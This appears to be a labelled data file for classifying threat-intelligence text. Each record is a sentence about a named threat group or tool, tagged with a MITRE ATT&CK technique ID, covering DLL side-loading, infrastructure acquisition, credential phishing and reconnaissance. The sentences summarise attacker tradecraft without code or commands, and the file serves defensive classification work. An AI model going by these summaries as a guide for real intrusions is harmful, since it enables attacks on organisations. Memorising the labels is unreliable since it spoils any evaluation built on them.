{"text1":"Clambling can store a file named `mpsvc.dll`, which opens a malicious `mpsvc.mui` file, in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution.","labels":"['T1574.002']"}
{"text1":"Denis exploits a security vulnerability to load a fake DLL and execute its code.","labels":"['T1574.002']"}
{"text1":"During Operation CuckooBees, the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs.","labels":"['T1574.002']"}
{"text1":"During the T9000 installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.","labels":"['T1574.002']"}
{"text1":"Earth Lusca has placed a malicious payload in `%WINDIR%\\SYSTEM32\\oci.dll` so it would be sideloaded by the MSDTC service.","labels":"['T1574.002']"}
{"text1":"Ecipekac can abuse the legitimate application policytool.exe to load a malicious DLL.","labels":"['T1574.002']"}
{"text1":"Egregor has used DLL side-loading to execute its payload.","labels":"['T1574.002']"}
{"text1":"FinFisher uses DLL side-loading to load malicious programs.","labels":"['T1574.002']"}
{"text1":"Goopy has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.","labels":"['T1574.002']"}
{"text1":"HTTPBrowser has used DLL side-loading.","labels":"['T1574.002']"}
{"text1":"Higaisa\u2019s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the \"OINFO12.OCX\" dynamic link library.","labels":"['T1574.002']"}
{"text1":"HyperBro has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.","labels":"['T1574.002']"}
{"text1":"Javali can use DLL side-loading to load malicious DLLs into legitimate executables.","labels":"['T1574.002']"}
{"text1":"Kerrdown can use DLL side-loading to load malicious DLLs.","labels":"['T1574.002']"}
{"text1":"LookBack side loads its communications module as a DLL into the \"libcurl.dll\" loader.","labels":"['T1574.002']"}
{"text1":"Metamorfo has side-loaded its malicious DLL file.","labels":"['T1574.002']"}
{"text1":"MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.","labels":"['T1574.002']"}
{"text1":"Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.","labels":"['T1574.002']"}
{"text1":"Nebulae can use DLL side-loading to gain execution.","labels":"['T1574.002']"}
{"text1":"Pandora can use DLL side-loading to execute malicious payloads.","labels":"['T1574.002']"}
{"text1":"PowGoop can side-load `Goopdate.dll` into `GoogleUpdate.exe`.","labels":"['T1574.002']"}
{"text1":"RCSession can be installed via DLL side-loading.","labels":"['T1574.002']"}
{"text1":"RainyDay can use side-loading to run malicious executables.","labels":"['T1574.002']"}
{"text1":"Sakula uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.","labels":"['T1574.002']"}
{"text1":"SideCopy has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.","labels":"['T1574.002']"}
{"text1":"Sidewinder has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.","labels":"['T1574.002']"}
{"text1":"SysUpdate can load DLLs through vulnerable legitimate executables.","labels":"['T1574.002']"}
{"text1":"Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants in which the DLL acts as a stub loader that loads and executes the shell code.","labels":"['T1574.002']"}
{"text1":"Tropic Trooper has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.","labels":"['T1574.002']"}
{"text1":"Waterbear has used DLL side loading to import and load a malicious DLL loader.","labels":"['T1574.002']"}
{"text1":"Wingbird side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.","labels":"['T1574.002']"}
{"text1":"ZeroT has used DLL side-loading to load malicious payloads.","labels":"['T1574.002']"}
{"text1":"menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as UPPERCUT.","labels":"['T1574.002']"}
{"text1":"APT41 has configured payloads to load via LD_PRELOAD.","labels":"['T1574.006']"}
{"text1":"XCSSET adds malicious file paths to the \"DYLD_FRAMEWORK_PATH\" and \"DYLD_LIBRARY_PATH\" environment variables to execute malicious code.","labels":"['T1574.006']"}
{"text1":"Empire contains modules that can discover and exploit search order hijacking vulnerabilities.","labels":"['T1574.008']"}
{"text1":"Empire contains modules that can discover and exploit unquoted path vulnerabilities.","labels":"['T1574.009']"}
{"text1":"One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.","labels":"['T1574.010']"}
{"text1":"Lazarus Group has abused the \"KernelCallbackTable\" to hijack process control flow and execute shellcode.","labels":"['T1574.013']"}
{"text1":"LAPSUS$ has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.","labels":"['T1578.002']"}
{"text1":"LAPSUS$ has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process.","labels":"['T1578.003']"}
{"text1":"APT1 has registered hundreds of domains for use in operations.","labels":"['T1583.001']"}
{"text1":"APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations.","labels":"['T1583.001']"}
{"text1":"APT29 has acquired C2 domains, sometimes through resellers.","labels":"['T1583.001']"}
{"text1":"APT32 has set up and operated websites to gather information and deliver malware.","labels":"['T1583.001']"}
{"text1":"Dragonfly has registered domains for targeting intended victims.","labels":"['T1583.001']"}
{"text1":"Earth Lusca has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.","labels":"['T1583.001']"}
{"text1":"FIN7 has registered look-alike domains for use in phishing campaigns.","labels":"['T1583.001']"}
{"text1":"Ferocious Kitten has acquired domains imitating legitimate sites.","labels":"['T1583.001']"}
{"text1":"For CostaRicto, the threat actors established domains, some of which appeared to spoof legitimate domains.","labels":"['T1583.001']"}
{"text1":"For Operation Dust Storm, the threat actors established domains as part of their operational infrastructure.","labels":"['T1583.001']"}
{"text1":"For Operation Spalax, the threat actors registered hundreds of domains using Duck DNS and DNS Exit.","labels":"['T1583.001']"}
{"text1":"Gamaredon Group has registered multiple domains to facilitate payload staging and C2.","labels":"['T1583.001']"}
{"text1":"HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.","labels":"['T1583.001']"}
{"text1":"IndigoZebra has established domains, some of which were designed to look like official government domains, for their operations.","labels":"['T1583.001']"}
{"text1":"Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels.","labels":"['T1583.001']"}
{"text1":"Leviathan has established domains that impersonate legitimate entities to use for targeting efforts.","labels":"['T1583.001']"}
{"text1":"Magic Hound has registered fraudulent domains such as \"mail-newyorker.com\" and \"news12.com.recover-session-service.site\" to target specific victims with phishing attacks.","labels":"['T1583.001']"}
{"text1":"Mustang Panda have acquired C2 domains prior to operations.","labels":"['T1583.001']"}
{"text1":"Silent Librarian has acquired domains to establish credential harvesting pages, often spoofing the target organization and using free top level domains .TK, .ML, .GA, .CF, and .GQ.","labels":"['T1583.001']"}
{"text1":"TA505 has registered domains to impersonate services such as Dropbox to distribute malware.","labels":"['T1583.001']"}
{"text1":"TeamTNT has obtained domains to host their payloads.","labels":"['T1583.001']"}
{"text1":"UNC2452 has acquired C2 domains through resellers.","labels":"['T1583.001']"}
{"text1":"menuPass has registered malicious domains for use in intrusion campaigns.","labels":"['T1583.001']"}
{"text1":"Axiom has acquired dynamic DNS services for use in the targeting of intended victims.","labels":"['T1583.002']"}
{"text1":"HEXANE has set up custom DNS servers to send commands to compromised hosts via TXT records.","labels":"['T1583.002']"}
{"text1":"Axiom has used VPS hosting providers in targeting of intended victims.","labels":"['T1583.003']"}
{"text1":"Dragonfly has acquired VPS infrastructure for use in malicious campaigns.","labels":"['T1583.003']"}
{"text1":"HAFNIUM has operated from leased virtual private servers (VPS) in the United States.","labels":"['T1583.003']"}
{"text1":"Earth Lusca has acquired multiple servers for some of their operations, using each server for a different role.","labels":"['T1583.004']"}
{"text1":"For Operation Honeybee, at least one identified persona was used to register for a free account for a control server.","labels":"['T1583.004']"}
{"text1":"Lazarus Group has acquired servers to host their malicious tools.","labels":"['T1583.004']"}
{"text1":"Sandworm Team has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations.","labels":"['T1583.004']"}
{"text1":"APT17 has created profile pages in Microsoft TechNet that were used as C2 infrastructure.","labels":"['T1583.006']"}
{"text1":"APT28 has used newly-created Blogspot pages for credential harvesting operations.","labels":"['T1583.006']"}
{"text1":"APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS.","labels":"['T1583.006']"}
{"text1":"Earth Lusca has established GitHub accounts to host their malware.","labels":"['T1583.006']"}
{"text1":"For Operation Sharpshooter, the threat actors used Dropbox to host lure documents and their first-stage downloader.","labels":"['T1583.006']"}
{"text1":"HAFNIUM has acquired web services for use in C2 and exfiltration.","labels":"['T1583.006']"}
{"text1":"IndigoZebra created Dropbox accounts for their operations.","labels":"['T1583.006']"}
{"text1":"LazyScripter has established GitHub accounts to host its toolsets.","labels":"['T1583.006']"}
{"text1":"Magic Hound has acquired Amazon S3 buckets to use in C2.","labels":"['T1583.006']"}
{"text1":"POLONIUM has created and used legitimate Microsoft OneDrive accounts for their operations.","labels":"['T1583.006']"}
{"text1":"Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration.","labels":"['T1583.006']"}
{"text1":"ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.","labels":"['T1583.006']"}
{"text1":"APT1 hijacked FQDNs associated with legitimate websites hosted by hop points.","labels":"['T1584.001']"}
{"text1":"APT29 has compromised domains to use for C2.","labels":"['T1584.001']"}
{"text1":"Kimsuky has compromised legitimate sites and used them to distribute malware.","labels":"['T1584.001']"}
{"text1":"Lazarus Group has compromised legitimate domains, including those hosted in the US and Italy, for C2.","labels":"['T1584.001']"}
{"text1":"Magic Hound has used compromised domains to host links targeted to specific phishing victims.","labels":"['T1584.001']"}
{"text1":"SideCopy has compromised domains for some of their infrastructure, including for C2 and staging malware.","labels":"['T1584.001']"}
{"text1":"Transparent Tribe has compromised domains for use in targeted malicious campaigns.","labels":"['T1584.001']"}
{"text1":"UNC2452 has compromised domains to use for C2.","labels":"['T1584.001']"}
{"text1":"APT16 has compromised otherwise legitimate sites as staging servers for second-stage payloads.","labels":"['T1584.004']"}
{"text1":"Dragonfly has compromised legitimate websites to host C2 and malware modules.","labels":"['T1584.004']"}
{"text1":"During Night Dragon, threat actors compromised web servers to use for C2.","labels":"['T1584.004']"}
{"text1":"Earth Lusca has used compromised web servers as part of their operational infrastructure.","labels":"['T1584.004']"}
{"text1":"Indrik Spider has served fake updates via legitimate websites that have been compromised.","labels":"['T1584.004']"}
{"text1":"Turla has used compromised servers as infrastructure.","labels":"['T1584.004']"}
{"text1":"Sandworm Team has used a large-scale botnet to target Small Office\/Home Office (SOHO) network devices.","labels":"['T1584.005']"}
{"text1":"Turla has frequently used compromised WordPress sites for C2 infrastructure.","labels":"['T1584.006']"}
{"text1":"APT32 has set up Facebook pages in tandem with fake websites.","labels":"['T1585.001']"}
{"text1":"Fox Kitten has used a Twitter account to communicate with ransomware victims.","labels":"['T1585.001']"}
{"text1":"HEXANE has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.","labels":"['T1585.001']"}
{"text1":"Kimsuky has created social media accounts to monitor news and security trends as well as potential targets.","labels":"['T1585.001']"}
{"text1":"Lazarus Group has created new LinkedIn and Twitter accounts to conduct social engineering against potential victims.","labels":"['T1585.001']"}
{"text1":"APT1 has created email accounts for later use in social engineering, phishing, and when registering domains.","labels":"['T1585.002']"}
{"text1":"EXOTIC LILY has created e-mail accounts to spoof targeted organizations.","labels":"['T1585.002']"}
{"text1":"For FunnyDream, the threat actors likely established an identified email account to register a variety of domains that were used during the campaign.","labels":"['T1585.002']"}
{"text1":"HEXANE has established email accounts for use in domain registration including for ProtonMail addresses.","labels":"['T1585.002']"}
{"text1":"Kimsuky has created email accounts for phishing operations.","labels":"['T1585.002']"}
{"text1":"Leviathan has created new email accounts for targeting efforts.","labels":"['T1585.002']"}
{"text1":"Magic Hound has established email accounts using fake personas for spearphishing operations.","labels":"['T1585.002']"}
{"text1":"Mustang Panda has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.","labels":"['T1585.002']"}
{"text1":"Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations.","labels":"['T1585.002']"}
|
|
{"text1":"Leviathan has compromised social media accounts to conduct social engineering attacks.","labels":"['T1586.001']"}
|
|
{"text1":"APT28 has used compromised email accounts to send credential phishing emails.","labels":"['T1586.002']"}
|
|
{"text1":"HEXANE has used compromised accounts to send spearphishing emails.","labels":"['T1586.002']"}
|
|
{"text1":"IndigoZebra has compromised legitimate email accounts to use in their spearphishing operations.","labels":"['T1586.002']"}
|
|
{"text1":"Kimsuky has compromised email accounts to send spearphishing e-mails.","labels":"['T1586.002']"}
|
|
{"text1":"Leviathan has compromised email accounts to conduct social engineering attacks.","labels":"['T1586.002']"}
|
|
{"text1":"Kimsuky created and used a mailing toolkit to use in spearphishing attacks.","labels":"['T1587']"}
|
|
{"text1":"APT29 has leveraged numerous pieces of malware that appear to be unique to APT29 and were likely developed for or by the group.","labels":"['T1587.001']"}
|
|
{"text1":"Aoqin Dragon has used custom malware, including Mongall and Heyoka Backdoor, in their operations.","labels":"['T1587.001']"}
|
|
{"text1":"Cleaver has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.","labels":"['T1587.001']"}
|
|
{"text1":"During Operation Wocao, threat actors developed their own custom webshells to upload to compromised servers.","labels":"['T1587.001']"}
|
|
{"text1":"FIN7 has developed malware for use in operations, including the creation of infected removable media.","labels":"['T1587.001']"}
|
|
{"text1":"For CostaRicto, the threat actors used custom malware, including PS1, CostaBricks, and SombRAT.","labels":"['T1587.001']"}
|
|
{"text1":"For Operation Sharpshooter, the threat actors used the Rising Sun modular backdoor.","labels":"['T1587.001']"}
|
|
{"text1":"Ke3chang has developed custom malware that allowed them to maintain persistence on victim networks.","labels":"['T1587.001']"}
|
|
{"text1":"Moses Staff has built malware, such as DCSrv and PyDCrypt, for targeting victims' machines.","labels":"['T1587.001']"}
|
|
{"text1":"Night Dragon used privately developed and customized remote access tools.","labels":"['T1587.001']"}
|
|
{"text1":"Sandworm Team has developed malware for its operations, including malicious mobile applications and destructive malware such as NotPetya and Olympic Destroyer.","labels":"['T1587.001']"}
|
|
{"text1":"TeamTNT has developed custom malware such as Hildegard.","labels":"['T1587.001']"}
|
|
{"text1":"Turla has developed its own unique malware for use in operations.","labels":"['T1587.001']"}
|
|
{"text1":"UNC2452 developed SUNSPOT, SUNBURST, TEARDROP, and Raindrop; SUNSPOT and SUNBURST were tailored to be incorporated into SolarWinds' Orion software library.","labels":"['T1587.001']"}
|
|
{"text1":"PROMETHIUM has created self-signed certificates to sign malicious installers.","labels":"['T1587.002']"}
|
|
{"text1":"Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.","labels":"['T1587.002']"}
|
|
{"text1":"APT29 has created self-signed digital certificates to enable mutual TLS authentication for malware.","labels":"['T1587.003']"}
|
|
{"text1":"For C0011, Transparent Tribe established SSL certificates on the typo-squatted domains the group registered.","labels":"['T1587.003']"}
|
|
{"text1":"PROMETHIUM has created self-signed digital certificates for use in HTTPS C2 traffic.","labels":"['T1587.003']"}
|
|
{"text1":"APT1 used publicly available malware for privilege escalation.","labels":"['T1588.001']"}
|
|
{"text1":"During Night Dragon, threat actors used Trojans from underground hacker websites.","labels":"['T1588.001']"}
|
|
{"text1":"For C0015, the threat actors used Cobalt Strike and Conti ransomware.","labels":"['T1588.001']"}
|
|
{"text1":"For FunnyDream, the threat actors used a new backdoor named FunnyDream.","labels":"['T1588.001']"}
|
|
{"text1":"For Operation Spalax, the threat actors obtained malware, including Remcos, njRAT, and AsyncRAT.","labels":"['T1588.001']"}
|
|
{"text1":"LAPSUS$ acquired and used the Redline password stealer in their operations.","labels":"['T1588.001']"}
|
|
{"text1":"LazyScripter has used a variety of open-source remote access Trojans for its operations.","labels":"['T1588.001']"}
|
|
{"text1":"TA505 has used malware such as Azorult and Cobalt Strike in their operations.","labels":"['T1588.001']"}
|
|
{"text1":"Turla has used malware obtained after compromising other threat actors, such as OilRig.","labels":"['T1588.001']"}
|
|
{"text1":"APT-C-36 obtained and used a modified variant of Imminent Monitor.","labels":"['T1588.002']"}
|
|
{"text1":"APT1 has used various open-source tools for privilege escalation purposes.","labels":"['T1588.002']"}
|
|
{"text1":"APT19 has obtained and used publicly-available tools like Empire.","labels":"['T1588.002']"}
|
|
{"text1":"APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder.","labels":"['T1588.002']"}
|
|
{"text1":"APT29 has obtained and used a variety of tools including Mimikatz, SDelete, Tor, meek, and Cobalt Strike.","labels":"['T1588.002']"}
|
|
{"text1":"APT32 has obtained and used tools such as Mimikatz and Cobalt Strike, and a variety of other open-source tools from GitHub.","labels":"['T1588.002']"}
|
|
{"text1":"APT33 has obtained and leveraged publicly-available tools for early intrusion activities.","labels":"['T1588.002']"}
|
|
{"text1":"APT38 has obtained and used open-source tools such as Mimikatz.","labels":"['T1588.002']"}
|
|
{"text1":"Aoqin Dragon obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations.","labels":"['T1588.002']"}
|
|
{"text1":"BITTER has obtained tools such as PuTTY for use in their operations.","labels":"['T1588.002']"}
|
|
{"text1":"BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.","labels":"['T1588.002']"}
|
|
{"text1":"BackdoorDiplomacy has obtained a variety of open-source reconnaissance and red team tools for discovery and lateral movement.","labels":"['T1588.002']"}
|
|
{"text1":"BlackTech has obtained and used tools such as Putty, SNScan, and PsExec for its operations.","labels":"['T1588.002']"}
|
|
{"text1":"Carbanak has obtained and used open-source tools such as PsExec and Mimikatz.","labels":"['T1588.002']"}
|
|
{"text1":"Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete.","labels":"['T1588.002']"}
|
|
{"text1":"CopyKittens has used Metasploit, Empire, and AirVPN for post-exploitation activities.","labels":"['T1588.002']"}
|
|
{"text1":"CostaRicto has obtained open source tools to use in their operations.","labels":"['T1588.002']"}
|
|
{"text1":"DarkHydrus has obtained and used tools such as Mimikatz, Empire, and Cobalt Strike.","labels":"['T1588.002']"}
|
|
{"text1":"Dragonfly has obtained and used tools such as Mimikatz, CrackMapExec, and PsExec.","labels":"['T1588.002']"}
|
|
{"text1":"During CostaRicto, the threat actors obtained open source tools to use in their operations.","labels":"['T1588.002']"}
|
|
{"text1":"Earth Lusca has acquired and used a variety of open source tools.","labels":"['T1588.002']"}
|
|
{"text1":"Ember Bear has obtained and used open source scripts from GitHub.","labels":"['T1588.002']"}
|
|
{"text1":"FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments.","labels":"['T1588.002']"}
|
|
{"text1":"FIN5 has obtained and used a customized version of PsExec, as well as other tools such as pwdump, SDelete, and Windows Credential Editor.","labels":"['T1588.002']"}
|
|
{"text1":"FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.","labels":"['T1588.002']"}
|
|
{"text1":"Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon.","labels":"['T1588.002']"}
|
|
{"text1":"For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker.","labels":"['T1588.002']"}
|
|
{"text1":"For Frankenstein, the threat actors obtained and used Empire.","labels":"['T1588.002']"}
|
|
{"text1":"For FunnyDream, the threat actors used a modified version of the open source PcShare remote administration tool.","labels":"['T1588.002']"}
|
|
{"text1":"For Operation Spalax, the threat actors obtained packers such as CyaX.","labels":"['T1588.002']"}
|
|
{"text1":"For Operation Wocao, the threat actors obtained a variety of open source tools, including JexBoss, KeeThief, and BloodHound.","labels":"['T1588.002']"}
|
|
{"text1":"Frankenstein has obtained and used Empire to deploy agents.","labels":"['T1588.002']"}
|
|
{"text1":"GALLIUM has used a variety of widely-available tools, which in some cases they modified to add functionality and\/or subvert antimalware solutions.","labels":"['T1588.002']"}
|
|
{"text1":"Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.","labels":"['T1588.002']"}
|
|
{"text1":"Kimsuky has obtained and used tools such as Nirsoft WebBrowserPassView, Mimikatz, and PsExec.","labels":"['T1588.002']"}
|
|
{"text1":"LAPSUS$ has obtained tools such as AD Explorer inspection software for their operations.","labels":"['T1588.002']"}
|
|
{"text1":"Leafminer has obtained and used tools such as LaZagne, Mimikatz, PsExec, and MailSniper.","labels":"['T1588.002']"}
|
|
{"text1":"Moses Staff has used the commercial tool DiskCryptor.","labels":"['T1588.002']"}
|
|
{"text1":"MuddyWater has made use of the legitimate tools ConnectWise and Remote Utilities to gain access to target environments.","labels":"['T1588.002']"}
|
|
{"text1":"Night Dragon has obtained and used tools such as gsecdump.","labels":"['T1588.002']"}
|
|
{"text1":"POLONIUM has obtained and used tools such as AirVPN and plink in their operations.","labels":"['T1588.002']"}
|
|
{"text1":"PittyTiger has obtained and used tools such as Mimikatz and gsecdump.","labels":"['T1588.002']"}
|
|
{"text1":"Sandworm Team has acquired open-source tools for some of its operations; for example, it acquired Invoke-PSImage to establish an encrypted channel from a compromised host to Sandworm Team's C2 server as part of its preparation for the 2018 Winter Olympics attack.","labels":"['T1588.002']"}
|
|
{"text1":"Silent Librarian has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations.","labels":"['T1588.002']"}
|
|
{"text1":"TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.","labels":"['T1588.002']"}
|
|
{"text1":"TEMP.Veles has obtained and used tools such as Mimikatz and PsExec.","labels":"['T1588.002']"}
|
|
{"text1":"Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor.","labels":"['T1588.002']"}
|
|
{"text1":"Turla has obtained and customized publicly-available tools like Mimikatz.","labels":"['T1588.002']"}
|
|
{"text1":"WIRTE has obtained and used Empire for post-exploitation activities.","labels":"['T1588.002']"}
|
|
{"text1":"Whitefly has obtained and used tools such as Mimikatz.","labels":"['T1588.002']"}
|
|
{"text1":"Wizard Spider has obtained and used publicly-available post-exploitation frameworks and tools like Metasploit, Empire, Mimikatz.","labels":"['T1588.002']"}
|
|
{"text1":"menuPass has used and modified open-source tools like Impacket, Mimikatz, and pwdump.","labels":"['T1588.002']"}
|
|
{"text1":"Ember Bear has stolen legitimate certificates to sign malicious payloads.","labels":"['T1588.003']"}
|
|
{"text1":"Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.","labels":"['T1588.003']"}
|
|
{"text1":"MegaCortex has used code signing certificates issued to fake companies to bypass security controls.","labels":"['T1588.003']"}
|
|
{"text1":"Wizard Spider obtained a code signing certificate signed by Digicert for some of its malware.","labels":"['T1588.003']"}
|
|
{"text1":"BlackTech has used valid, stolen digital certificates for some of their malware and tools.","labels":"['T1588.004']"}
|
|
{"text1":"Kimsuky has obtained exploit code for various CVEs.","labels":"['T1588.005']"}
|
|
{"text1":"In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport.","labels":"['T1588.006']"}
|
|
{"text1":"APT32 has conducted targeted surveillance against activists and bloggers.","labels":"['T1589']"}
|
|
{"text1":"HEXANE has identified specific potential victims at targeted organizations.","labels":"['T1589']"}
|
|
{"text1":"LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures.","labels":"['T1589']"}
|
|
{"text1":"APT28 has harvested users' login credentials.","labels":"['T1589.001']"}
|
|
{"text1":"APT29 has conducted credential theft operations to obtain credentials to be used for access to victim environments.","labels":"['T1589.001']"}
|
|
{"text1":"Chimera has collected credentials for the target organization from previous breaches for use in brute force attacks.","labels":"['T1589.001']"}
|
|
{"text1":"LAPSUS$ has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials.","labels":"['T1589.001']"}
|
|
{"text1":"Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites.","labels":"['T1589.001']"}
|
|
{"text1":"AADInternals can check for the existence of user email addresses using public Microsoft APIs.","labels":"['T1589.002']"}
|
|
{"text1":"APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware.","labels":"['T1589.002']"}
|
|
{"text1":"EXOTIC LILY has gathered targeted individuals' e-mail addresses through open source research and website contact forms.","labels":"['T1589.002']"}
|
|
{"text1":"HEXANE has targeted executives, human resources staff, and IT personnel for spearphishing.","labels":"['T1589.002']"}
|
|
{"text1":"Kimsuky has collected valid email addresses that were subsequently used in spearphishing campaigns.","labels":"['T1589.002']"}
|
|
{"text1":"Lazarus Group collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.","labels":"['T1589.002']"}
|
|
{"text1":"Sandworm Team has obtained valid email addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.","labels":"['T1589.002']"}
|
|
{"text1":"Silent Librarian has collected e-mail addresses from targeted organizations from open Internet searches.","labels":"['T1589.002']"}
|
|
{"text1":"Sandworm Team's research of potential victim organizations included the identification and collection of employee information.","labels":"['T1589.003']"}
|
|
{"text1":"Silent Librarian has collected lists of names for individuals from targeted organizations.","labels":"['T1589.003']"}
|
|
{"text1":"AADInternals can gather information about a tenant\u2019s domains using public Microsoft APIs.","labels":"['T1590.001']"}
|
|
{"text1":"Sandworm Team conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.","labels":"['T1590.001']"}
|
|
{"text1":"Andariel has limited its watering hole attacks to specific IP address ranges.","labels":"['T1590.005']"}
|
|
{"text1":"Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and\/or individuals.","labels":"['T1591']"}
|
|
{"text1":"Dragonfly has collected open source information to identify relationships between organizations for targeting purposes.","labels":"['T1591.002']"}
|
|
{"text1":"LAPSUS$ has gathered detailed knowledge of an organization's supply chain relationships.","labels":"['T1591.002']"}
|
|
{"text1":"HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting.","labels":"['T1591.004']"}
|
|
{"text1":"LAPSUS$ has gathered detailed knowledge of team structures within a target organization.","labels":"['T1591.004']"}
|
|
{"text1":"Lazarus Group has targeted specific individuals within an organization with tailored job vacancy announcements.","labels":"['T1591.004']"}
|
|
{"text1":"Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.","labels":"['T1592.002']"}
|
|
{"text1":"Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack. Sandworm Team also collected a list of computers using specific software as part of its targeting efforts.","labels":"['T1592.002']"}
|
|
{"text1":"HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.","labels":"['T1592.004']"}
|
|
{"text1":"EXOTIC LILY has copied data from social media sites to impersonate targeted individuals.","labels":"['T1593.001']"}
|
|
{"text1":"Kimsuky has used Twitter to monitor potential victims and to prepare targeted phishing e-mails.","labels":"['T1593.001']"}
|
|
{"text1":"Lazarus Group has used LinkedIn to identify and target specific employees within a chosen organization.","labels":"['T1593.001']"}
|
|
{"text1":"Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims.","labels":"['T1593.002']"}
|
|
{"text1":"LAPSUS$ has searched public code repositories for exposed credentials.","labels":"['T1593.003']"}
|
|
{"text1":"EXOTIC LILY has used contact forms on victim websites to generate phishing e-mails.","labels":"['T1594']"}
|
|
{"text1":"Kimsuky has searched for information on the target company's website.","labels":"['T1594']"}
|
|
{"text1":"Sandworm Team has conducted research against potential victim websites as part of its operational planning.","labels":"['T1594']"}
|
|
{"text1":"TeamTNT has scanned specific lists of target IP addresses.","labels":"['T1595.001']"}
|
|
{"text1":"APT28 has performed large-scale scans in an attempt to find vulnerable servers.","labels":"['T1595.002']"}
|
|
{"text1":"APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.","labels":"['T1595.002']"}
|
|
{"text1":"Earth Lusca has scanned for vulnerabilities in the public-facing servers of their targets.","labels":"['T1595.002']"}
|
|
{"text1":"Magic Hound has conducted widespread scanning to identify public-facing systems vulnerable to Log4j (CVE-2021-44228).","labels":"['T1595.002']"}
|
|
{"text1":"Sandworm Team has scanned network infrastructure for vulnerabilities as part of its operational planning.","labels":"['T1595.002']"}
|
|
{"text1":"TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.","labels":"['T1595.002']"}
|
|
{"text1":"Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains.","labels":"['T1595.003']"}
|
|
{"text1":"EXOTIC LILY has searched for information on targeted individuals on business databases including RocketReach and CrunchBase.","labels":"['T1597']"}
|
|
{"text1":"LAPSUS$ has purchased credentials and session tokens from criminal underground forums.","labels":"['T1597.002']"}
|
|
{"text1":"APT28 has used spearphishing to compromise credentials.","labels":"['T1598']"}
|
|
{"text1":"ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.","labels":"['T1598']"}
|
|
{"text1":"Astaroth has been delivered via malicious e-mail attachments.","labels":"['T1598.002']"}
|
|
{"text1":"Dragonfly has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.","labels":"['T1598.002']"}
|
|
{"text1":"Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites.","labels":"['T1598.002']"}
|
|
{"text1":"AADInternals can send phishing emails containing malicious links designed to collect users\u2019 credentials.","labels":"['T1598.003']"}
|
|
{"text1":"APT28 has conducted credential phishing campaigns with embedded links to attacker-controlled domains.","labels":"['T1598.003']"}
|
|
